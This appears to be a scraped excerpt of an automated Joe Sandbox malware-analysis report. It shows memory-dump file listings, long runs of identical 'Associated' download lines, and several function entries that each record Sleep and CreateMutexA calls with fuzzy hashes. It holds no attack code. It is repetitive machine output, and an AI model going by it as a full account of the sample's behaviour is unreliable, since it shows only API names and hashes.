Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5e4cea6619a155278bcff9e74136fff10fed660d2ee6659b3d79dd372361482f
Instruction ID: 1ae2542c97bf4da6cb8e7d0fc9ee607580877c15db83ea4844221f5e240634bc
Opcode Fuzzy Hash: 5e4cea6619a155278bcff9e74136fff10fed660d2ee6659b3d79dd372361482f
Instruction Fuzzy Hash: 6D3148316812049BFB08DBB8DD89BADB766EFC1314F20821AF014AB3E5C77599A08656

Function 009DA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 329cfb60275fcbe3c365392eedbb72122ef08d027da7b3fdacb307bd65797399
Instruction ID: 0829e9cdcd27bba09900a1f9a410bf60bc9588e7454ddd35196fd6f0944483e7
Opcode Fuzzy Hash: 329cfb60275fcbe3c365392eedbb72122ef08d027da7b3fdacb307bd65797399
Instruction Fuzzy Hash: 303188316812048BFB08DFB8DC89B6DB766EBC1318F24C61AF014AB3D1C77999A08753

Function 009DA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a461abd78383b93fd2c2cc170ad1a79b7180e8b56a9c60578e4bfbd4c279434d
Instruction ID: d86dfa76783509028b25342ad332f55a0166ee5b663381f164c62917f29ca89d
Opcode Fuzzy Hash: a461abd78383b93fd2c2cc170ad1a79b7180e8b56a9c60578e4bfbd4c279434d
Instruction Fuzzy Hash: 3B317931A41200DBFB08DFB8DC8976DB776EBC1314F24C61AE014AB3D1C77599A08756

Function 009D9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 7643571bdee15542a3b6ca6de78c8e1fba71eef07eae71f3299d251c04101aa7
Instruction ID: 46bf248d3505b5beb13cfd8bf07838ec71b9991a58d65cb0f8868c223589963e
Opcode Fuzzy Hash: 7643571bdee15542a3b6ca6de78c8e1fba71eef07eae71f3299d251c04101aa7
Instruction Fuzzy Hash: 862149326852009BFB18AFACECC576DF765EBD1314F20821AF4189B3D5C779A9908652

Function 009DA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5a7ef9786bf2991d914c720e7230793aecc8194c9ce11178b203bfbcb8c21a3d
Instruction ID: 9d59142a1270e5147f3f098bc27b20be47b73f30b2790930edc269e53ba8a078
Opcode Fuzzy Hash: 5a7ef9786bf2991d914c720e7230793aecc8194c9ce11178b203bfbcb8c21a3d
Instruction Fuzzy Hash: AF216D312CA2019AFB24ABE89C9672DF216DFC1300F60C817F804963D1DB7A99A191A3

Function 009DA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
